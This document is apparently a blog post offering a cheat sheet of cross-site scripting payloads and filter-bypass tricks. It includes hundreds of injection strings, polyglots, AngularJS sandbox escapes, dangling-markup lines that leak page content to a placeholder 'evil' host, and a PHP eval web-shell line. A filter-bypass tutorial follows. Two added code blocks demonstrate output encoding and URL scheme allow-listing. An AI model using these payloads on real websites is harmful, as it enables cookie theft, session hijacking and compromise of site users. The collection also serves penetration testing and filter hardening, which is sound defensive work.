Blind XSS payloads and their bypasses

Posted by 0nlyuAar0n on 2021-08-10

XSS

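Payload quick reference

Special-character test (use the echoed response to see how the system handles them and whether it raises an error):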
=!@#$%^&*()_+|}{[]

Decimal value    URL encoding    Description
47               %2F             Forward slash
13               %0D             Carriage return
12               %0C             Form feed
10               %0A             Line feed
9                %09             Horizontal tab

General:

# Angle brackets are filtered
onclick="prompt(document.cookie)
-----------------------------------------------
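# The location being modified must be a PHP file.

# It can only be used where this genuinely exists under PHP; the method works purely because PHP supports HTML, so it counts as one more option. PHP 7 removed it.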
<script language="php">eval($_POST[c])</script>
"><script language=php>phpinfo();</script>
# https://blog.csdn.net/qq_18501087/article/details/89811397
--------------------------------------------

><script>alert(document.cookie)</script>


</textarea><script>alert("xss")</script>



<img src="pic.gif" onerror="javascript:this.src='/noPic.gif';" alt="pic" />



# Check whether the front end closes with ">

"><img src="pdpdp.gif"></img> //

"><img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1563853097733&di=9b803160596e63aaf5761db810cee45e&imgtype=0&src=http%3A%2F%2Fimg0.pconline.com.cn%2Fpconline%2F1605%2F30%2F7957982_25_thumb.jpg"></img> //
--------------------------------------------
# svg
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>
<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>
<svg/onload=alert(1)>
<svg

onload=alert(1)><svg> # newline char

<svg onload=alert(1)><svg> # tab char

<svg onload=alert(1)> # new page char (0xc)

--------------------------------------------
">< a href="javascript:alert(/test/)">xss</ a>
Link injection:
"><a href=javascript:a='al';b='ert';c='(/xss/)';eval(a+b+c)>x&page=1

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe> # using the iframe tag

"><iframe src=javascript:alert('xss');height=0 width=0 /><iframe><

"><iframe src=javascript:alert('xss');></iframe><

When alert is filtered:
<img src="1" \x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

"><img src="1" \x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>"<

<input type="text" class="form-control" name="category.categoryName" value=" ">

<input type="text" class="form-control" name="name" value=" "><img src="1" \x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img><“ ">


<input type="text" class="form-control" id="resName" placeholder="请输入项目名称 "><a href=javascript:a='al';b='ert';c='(/xss/)';eval(a+b+c)>x&page=1
<“ ">

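Event notes:

Event name          Tags            Notes
onplay              video, audio    Suitable for 0-click: combine with the HTML autoplay attribute and a valid video/audio file
onplaying           video, audio    Suitable for 0-click: combine with the HTML autoplay attribute and a valid video/audio file
oncanplay           video, audio    Must link to a valid video/audio file
onloadeddata        video, audio    Must link to a valid video/audio file
onloadedmetadata    video, audio    Must link to a valid video/audio file
onprogress          video, audio    Must link to a valid video/audio file
onloadstart         video, audio    Potential 0-click vector
oncanplay           video, audio    Must link to a valid video/audio file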

Events

<video autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadeddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadedmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadstart="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadstart="alert()"><source src=x></video>

<video controls oncanplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<audio autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>

<audio autoplay controls onplaying="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<object data="data:text/html,<script>alert(5)</script>">

<iframe srcdoc="<svg onload=alert(4);>">

<object data=javascript:alert(3)>

<iframe src=javascript:alert(2)>

<embed src=javascript:alert(1)>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>

<embed src=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczL**yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>

About the DOM

Characters    Usage              Polyglot
141           DOM and non-DOM    javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
88            non-DOM            "'--></noscript></noembed></template></title></textarea></style><script>alert()</script>
95            DOM                '"--></title></textarea></style></noscript></noembed></template></frameset><svg onload=alert()>
54            non-DOM            "'>-->*/</noscript></ti tle><script>alert()</script>
42            DOM                "'--></style></script><svg onload=alert()>

210 payloads:

<a id=x tabindex=1 onactivate=alert(1)></a>
<body onafterprint=alert(2)>
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(3)"></a>
<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(4)"></a>
<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(5)"></a>
<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(6)"></a>
<a id=x tabindex=1 onbeforeactivate=alert(7)></a>
<a id=x tabindex=1 onbeforedeactivate=alert(8)></a><input autofocus>
<body onbeforeprint=alert(9)>
<body onbeforeunload="location='javascript:alert(10)'">
<svg><animate onbegin=alert(11) attributeName=x dur=1s>
<a onblur=alert(12) tabindex=1 id=x></a><input autofocus>
<marquee width=1 loop=1 onbounce=alert(13)>XSS</marquee>
<audio oncanplay=alert(14)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(15)><source src="validvideo.mp4" type="video/mp4"></video>
<a id=x tabindex=1 ondeactivate=alert(16)></a><input id=y autofocus>
<svg><animate onend=alert(17) attributeName=x dur=1s>
<audio controls autoplay onended=alert(18)><source src="validaudio.wav" type="audio/wav"></audio>
<audio src/onerror=alert(19)>
<marquee width=1 loop=1 onfinish=alert(20)>XSS</marquee>
<a id=x tabindex=1 onfocus=alert(21)></a>
<a id=x tabindex=1 onfocusin=alert(22)></a>
<a onfocusout=alert(23) tabindex=1 id=x></a><input autofocus>
<body onhashchange="alert(24)">
<svg><a onload=alert(25)></a>
<audio onloadeddata=alert(26)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay onloadedmetadata=alert(27)> <source src="validaudio.wav" type="audio/wav"></audio>
<image src=validimage.png onloadend=alert(28)>
<image src=validimage.png onloadstart=alert(29)>
<body onmessage=alert(30)>
<body onpageshow=alert(31)>
<audio autoplay onplay=alert(32)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay onplaying=alert(33)><source src="validaudio.wav" type="audio/wav"></audio>
<body onpopstate=alert(34)>
<applet onreadystatechange=alert(35)></applet>
<svg><animate onrepeat=alert(36) attributeName=x dur=1s repeatCount=2 />
<body onresize="alert(37)">
<body onscroll=alert(38)><div style=height:1000px></div><div id=x></div>
<marquee onstart=alert(39)>XSS</marquee>
<audio controls autoplay ontimeupdate=alert(40)><source src="validaudio.wav" type="audio/wav"></audio>
<details ontoggle=alert(41) open>test</details>
<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(42)></a>
<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(43)></a>
<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(44)></a>
<body onunhandledrejection=alert(45)><script>fetch('//xyz')</script>
<video autoplay controls onwaiting=alert(46)><source src="validvideo.mp4" type=video/mp4></video>
<input onauxclick=alert(47)>
<a onbeforecopy="alert(48)" contenteditable>test</a>
<a onbeforecut="alert(49)" contenteditable>test</a>
<a onbeforepaste="alert(50)" contenteditable>test</a>
<input onchange=alert(51) value=xss>
<a onclick="alert(52)">test</a>
<a oncontextmenu="alert(53)">test</a>
<a oncopy="alert(54)" contenteditable>test</a>
<a oncut="alert(55)" contenteditable>test</a>
<a ondblclick="alert(56)">test</a>
<a draggable="true" ondrag="alert(57)">test</a>
<a draggable="true" ondragend="alert(58)">test</a>
<a draggable="true" ondragenter="alert(59)">test</a>
<a draggable="true" ondragleave="alert(60)">test</a>
<div draggable="true" contenteditable>drag me</div><a ondragover=alert(61) contenteditable>drop here</a>
<a draggable="true" ondragstart="alert(62)">test</a>
<div draggable="true" contenteditable>drag me</div><a ondrop=alert(63) contenteditable>drop here</a>
<input oninput=alert(64) value=xss>
<form><input oninvalid=alert(65) required><input type=submit>
<a onkeydown="alert(66)" contenteditable>test</a>
<a onkeypress="alert(67)" contenteditable>test</a>
<a onkeyup="alert(68)" contenteditable>test</a>
<a onmousedown="alert(69)">test</a>
<a onmouseenter="alert(70)">test</a>
<a onmouseleave="alert(71)">test</a>
<a onmousemove="alert(72)">test</a>
<a onmouseout="alert(73)">test</a>
<a onmouseover="alert(74)">test</a>
<a onmouseup="alert(75)">test</a>
<a onpaste="alert(76)" contenteditable>test</a>
<audio autoplay controls onpause=alert(77)><source src="validaudio.wav" type="audio/wav"></audio>
<form onreset=alert(78)><input type=reset>
<form><input type=search onsearch=alert(79) value="Hit return" autofocus>
<audio autoplay controls onseeked=alert(80)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay controls onseeking=alert(81)><source src="validaudio.wav" type="audio/wav"></audio>
<input onselect=alert(82) value="XSS" autofocus>
<form onsubmit=alert(83)><input type=submit>
<svg onunload=window.open('javascript:alert(84)')>
<audio autoplay controls onvolumechange=alert(85)><source src="validaudio.wav" type="audio/wav"></audio>
<body onwheel=alert(86)>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,'=alert\x281\x29'</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
<script>alert`1`</script>
<xss class=progress-bar-animated onanimationstart=alert(97)>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(98)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe src="javascript:alert(99)">
<object data="javascript:alert(100)">
<embed src="javascript:alert(101)">
<a href="javascript:alert(102)">XSS</a>
<a href="JaVaScript:alert(103)">XSS</a>
<a href=" javascript:alert(104)">XSS</a>
<a href="javas cript:alert(105)">XSS</a>
<svg><a xlink:href="javascript:alert(106)"><text x="20" y="20">XSS</text></a>
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(107) /><a id=xss><text x=20 y=20>XSS</text></a>
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(108) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(109) /><a id=xss><text x=20 y=20>XSS</text></a>
<script src="data:text/javascript,alert(110)"></script>
<svg><script href="data:text/javascript,alert(111)" />
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(112)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
<script>import('data:text/javascript,alert(113)')</script>
<base href="javascript:/a/-alert(114)///////"><a href=../lol/safari.html>test</a>
<math><x href="javascript:alert(115)">blah
<form><button formaction=javascript:alert(116)>XSS
<form><input type=submit formaction=javascript:alert(117) value=XSS>
<form action=javascript:alert(118)><input type=submit value=XSS>
<isindex type=submit formaction=javascript:alert(119)>
<isindex type=submit action=javascript:alert(120)>
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
<iframe srcdoc="<img src=1 onerror=alert(122)>"></iframe>
<iframe srcdoc="&lt;img src=1 onerror=alert(123)&gt;"></iframe>
<form action="javascript:alert(124)"><input type=submit id=x></form><label for=x>XSS</label>
<input type="hidden" accesskey="X" onclick="alert(125)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<link rel="canonical" accesskey="X" onclick="alert(126)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<a href=# download="filename.html">Test</a>
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
<meta charset="UTF-7" /> +ADw-script+AD4-alert(130)+ADw-/script+AD4-
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(131)+ADw-/script+AD4-
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<iframe sandbox src="//portswigger-labs.net"></iframe>
<meta name="referrer" content="no-referrer">
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<a href="&#106;avascript:alert(139)">XSS</a><a href="&#106avascript:alert(139)">XSS</a>
<a href="&#0000106avascript:alert(140)">XSS</a>
<a href="&#x6a;avascript:alert(141)">XSS</a>
<a href="&#x0000006a;avascript:alert(142)">XSS</a>
<a href="&#X6A;avascript:alert(143)">XSS</a>
<a href="javascript:x='%27-alert(144)-%27';">XSS</a>
<a href="javascript:x='&percnt;27-alert(145)-%27';">XSS</a>
<a href="javascript&#x6a;avascript:alert(146)">Firefox</a>
<a href="javascript&colon;alert(147)">Firefox</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
{{constructor.constructor('alert(149)')()}}
{{$on.constructor('alert(150)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}}
{{{}.")));alert(152)//"}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}}
{{{}.")));alert(155)//"}}
{{{}.")));alert(156)//"}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}}
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}}
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}}
{{constructor.constructor('alert(162)')()}}
{{$on.constructor('alert(163)')()}}
constructor.constructor('alert(164)')()
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')()
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor)
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')()
{}.")));alert(168)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//';
constructor.constructor('alert(170)')()
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
<link rel=stylesheet href="//evil?
<link rel=icon href="//evil?
<meta http-equiv="refresh" content="0; http://evil?
<video><track default src="//evil?
<video><source src="//evil?
<audio><source src="//evil?
<input type=image src="//evil?
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
<isindex type=image src="//evil?
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
<object data="//evil?
<iframe src="//evil?
<embed src="//evil?
<form><button formaction=//evil>XSS</button><textarea name=x>
<button form=x>XSS</button><form id=x action=//evil target='
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(200)//'>
<img src="javascript:alert(201)">
<body background="javascript:alert(202)">
<iframe src="data:text/html,<img src=1 onerror=alert(203)>">
<a title="&{alert(204)}">XSS</a>
<link href="xss.js" rel=stylesheet type="text/javascript">
<form><button name=x formaction=x><b>stealme
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(209)">XSS</a>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(210)>"> </BODY></HTML>

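XSS bypass techniques

Source: 白泽Sec安全实验室 (Baize Sec Security Lab)

Preface

XSS is one of the common vulnerabilities in web applications. Site administrators can avoid XSS vulnerabilities by filtering user input, converting output data according to its context, using the DOM correctly, enforcing a cross-origin resource sharing (CORS) policy, and applying other security policies. Although there are now many techniques for preventing XSS attacks, web application firewalls (WAFs) and custom data filters are among the most widely used protections today, and many vendors rely on them to defend against new XSS attack vectors.

Sometimes a generic bypass technique does not work. In that case we have to look at the environment around the flaw and think of another way. A "dirty-trick bypass" differs from a generic bypass in that it has little generality and is often just a special case.

1. Bypassing single-quote filtering

A "\" is placed before our single quote, and sometimes before double quotes as well; functions similar to add_slashes do this. This is the escape character, and our earlier code becomes:
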
<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

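There are ways to carry on, but it depends on how the filtering function is applied. One method is to use character entities. Anyone who has learned HTML knows that certain special characters are represented by fixed symbol combinations. For example, you cannot use <> to mean greater-than and less-than, because they are interpreted as HTML tags; if you need them, use the following instead.

Numeric entity    Named entity    Character    Description
&#34;             &quot;          "            Double quote
&#38;             &amp;           &            Ampersand
&#60;             &lt;            <            Less-than sign
&#62;             &gt;            >            Greater-than sign

Using &quot; or &#34; in place of our double quotes can sometimes bypass the filter.

Example:
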
<script>alert("XSS")</script>
<script>alert(&quot;XSS&quot;)</script>
<script>alert(&#34;XSS&#34;)</script>

If all of these are filtered as well, we can use JavaScript's fromCharCode function, which converts the given Unicode values into a string.

Example:

<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83))</script>

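2. Bypassing <SCRIPT> filtering

Some filters strip the <script> tag, which kills all of the examples above. There are still ways to insert JavaScript, though. Let's look at an event handler example.
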
<BODY onload="alert('XSS')">

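In HTML, the onload keyword is an event. None of the other tags have this attribute, but the Body tag does. It has a limitation, though: if the onload event has already been handled before your code, it will not fire. We can go on to look at onerror event handling.
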
<IMG SRC="" onerror="alert('XSS')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

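Note that no image is specified, so an error occurs. The onerror event then fires and triggers the XSS vulnerability, without using the <script> tag.

If the <script></script> tags are stripped out, you can use:
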
<scr<script>ipt>alert(1)</scr<script>ipt>

3. Bypassing via (Input) tag attributes

<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

Close the <input>:

'><SCRIPT>alert("XSS")</SCRIPT>

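Now our code executes. Because we closed the preceding HTML tag, the XSS is triggered. However, you may notice an extra single quote displayed on the page. Why? Because the original trailing single quote is left unmatched. Let's keep modifying our code.
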
'><SCRIPT>alert("XSS")</SCRIPT><xss a='

The whole input then becomes:

<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>

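The JavaScript code is now injected. The <xss a=''> part has no meaning and you can change it yourself, but it conforms to the HTML standard, so the page will not break.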
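
Why the filters described in sections 1 to 3 fail, and what output encoding does instead, as an added example that is not part of the original post: it runs the page's own strings through an addslashes-style filter and a single-pass <script> stripper, then through HTML encoding. All function names are hypothetical.

```javascript
// Added example, not code from the original post. All names are hypothetical.
// The sample inputs are the strings shown in sections 1-3 of this page.
const ATTR_BREAKOUT = `'><SCRIPT>alert("XSS")</SCRIPT><xss a='`;
const NESTED_TAG = "<scr<script>ipt>alert(1)</scr<script>ipt>";
const EVENT_HANDLER = `<IMG SRC="" onerror="alert('XSS')">`;

// Weak filter 1: addslashes-style escaping. A backslash matters inside
// JavaScript or SQL string literals, but means nothing to an HTML parser.
function addSlashes(input) {
  return input.replace(/(['"\\])/g, "\\$1");
}

// Weak filter 2: a single pass that deletes <script> and </script> tags.
function stripScriptTagsOnce(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Fix for HTML text and quoted attribute values: encode every character
// that can end the attribute value or open a tag.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// The template from section 3: user data inside a single-quoted attribute.
function renderInput(value) {
  return `<INPUT type="text" value='${value}'>`;
}

// What an HTML parser takes as that attribute's value: everything up to the
// next raw single quote. Whatever follows is parsed as markup.
function parsedAttributeValue(html) {
  const start = html.indexOf("value='") + "value='".length;
  return html.slice(start, html.indexOf("'", start));
}

function demo() {
  return {
    // Value ends right after the backslash; the rest escaped the attribute.
    slashed: parsedAttributeValue(renderInput(addSlashes(ATTR_BREAKOUT))),
    // Removing the inner tags reassembles the outer ones.
    strippedNested: stripScriptTagsOnce(NESTED_TAG),
    // No <script> tag present, so the filter changes nothing.
    strippedHandler: stripScriptTagsOnce(EVENT_HANDLER),
    // Encoded input stays entirely inside the attribute value.
    encoded: renderInput(escapeHtml(ATTR_BREAKOUT)),
  };
}

console.log(demo());
```

escapeHtml covers HTML text and quoted attribute contexts only; data placed inside a script block, a URL attribute or a style needs the encoder for that context.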

4. Bypassing with mixed case

<iMg SRC = "JavaScript:alert(0);">

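Omitting quotes or constructing full-width characters can also confuse filter rules.

Also, /**/ in CSS is ignored by the browser, and \ and \0 are likewise ignored by the browser, so they can be used for bypasses too:

<img src ="java/*javascript:alert('xss')*/script:alert(1);">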

5. Bypassing magic_quotes_gpc

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script> 

6. Bypassing semicolon and quote filtering

<IMG SRC=javascript:alert('XSS')>    
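
Sections 4 and 6 rely on filters that match the literal string "javascript:"; the defensive counterpart is to parse the URL and allow-list its scheme. This is an added example, not code from the original post; the function names, the allowed-scheme set and the base URL are assumptions.

```javascript
// Added example, not code from the original post. Names, the allowed
// schemes and the base URL are hypothetical.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Weak check: case-sensitive prefix match on the raw string.
function naivePrefixCheck(value) {
  return !value.startsWith("javascript:");
}

// Allow-list check: parse the value the way a browser resolves a URL
// (leading spaces trimmed, tabs/newlines removed, scheme lower-cased),
// then accept only known-good schemes.
function isAllowedUrl(value, base = "https://app.example/") {
  let parsed;
  try {
    parsed = new URL(value, base);
  } catch {
    return false; // unparseable input is rejected, never passed through
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

const SAMPLES = [
  "JaVaScript:alert(103)",                         // from the page's list
  " javascript:alert(104)",                        // from the page's list
  "javas\tcript:alert(105)",                       // constructed: tab inside the scheme
  "data:text/html,<img src=1 onerror=alert(203)>", // from the page's list
  "/profile?id=7",                                 // constructed benign relative URL
  "https://example.com/help",                      // constructed benign absolute URL
];

// Returns one row per sample with the verdict of each check.
function classify(samples) {
  return samples.map((value) => ({
    value,
    naive: naivePrefixCheck(value),
    allowList: isAllowedUrl(value),
  }));
}

console.table(classify(SAMPLES));
```

The check must see the attribute value as the browser will, so the accepted URL is still HTML-encoded when written into the page; otherwise an entity such as &#106; is decoded after validation.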

7. Bypassing when parentheses are filtered

When parentheses are filtered, throw can be used to bypass:

<a onmouseover="javascript:window.onerror=alert;throw 1">
<img src=x onerror="javascript:window.onerror=alert;throw 1">

The two test vectors above produce an "uncaught" error in Chrome and IE; the following vector can be used instead:

<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>

8. Bypassing when = ( ) ; : are filtered

<svg><script>alert&#40/1/&#41</script> // works in all browsers

In Opera the tag does not need to be closed:

<svg><script>alert&#40 1&#41 // can be checked in Opera
